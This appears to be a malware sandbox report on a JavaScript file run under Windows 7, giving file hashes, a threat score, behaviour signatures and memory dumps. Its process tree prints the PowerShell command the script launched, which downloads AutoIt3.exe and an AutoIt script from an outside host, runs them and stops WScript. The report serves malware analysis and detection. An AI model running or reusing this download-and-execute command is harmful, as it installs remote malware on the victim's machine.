Overview

overview

10

Static

static

1

07112023_2...d4).js

windows7-x64

3

07112023_2...d4).js

windows10-2004-x64

10

Analysis

  • max time kernel
    122s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20231023-en
  • resource tags

    arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system
  • submitted
    07-11-2023 14:38

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    07112023_2238_app(060e45bf7b57d4).js

  • Size

    252KB

  • MD5

    9edd0adf749c9406b020d9ca613daa62

  • SHA1

    701cc4130fd3b8b17d6692101b7bd80d9a14b68c

  • SHA256

    aff263702a19eb6640636f8c2708147a5ce8a5577d86a57224ddbe0f51c7dafe

  • SHA512

    99df3475b72b2576123a7a46338470346b30e6ac10d9bd8506c6b359de2bf7308d0d85ece3039f3388d6feed7a6e7774eb4300c4ecc4435bf6361e59ab8e52da

  • SSDEEP

    6144:ge7hgXeerjqlI2Iro+ra4xB9ElITe7hgXeerjqlI2Iro+8:gIhgSlI23qa4xB9ElITIhgSlI23V

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\07112023_2238_app(060e45bf7b57d4).js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2116
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ni 'C:/tepp' -Type Directory -Force;cd 'C:/tepp'; Invoke-WebRequest -Uri 'http://siliconerumble.com:443' -OutFile 'AutoIt3.exe' -UserAgent 'curl/7.68.0';Invoke-WebRequest -Uri 'http://siliconerumble.com:443/msijhoziucv' -OutFile 'jhoziucv.au3' -UserAgent 'curl/7.68.0';start 'AutoIt3.exe' -a 'jhoziucv.au3'"; Stop-Process -Name "WScript"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1688

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1688-4-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/1688-6-0x000000001B200000-0x000000001B4E2000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/1688-5-0x0000000002680000-0x0000000002700000-memory.dmp

    Filesize

    512KB

    Download

  • memory/1688-8-0x0000000002390000-0x0000000002398000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1688-7-0x0000000002680000-0x0000000002700000-memory.dmp

    Filesize

    512KB

    Download

  • memory/1688-9-0x0000000002680000-0x0000000002700000-memory.dmp

    Filesize

    512KB

    Download

  • memory/1688-10-0x000007FEF5300000-0x000007FEF5C9D000-memory.dmp

    Filesize

    9.6MB

    Download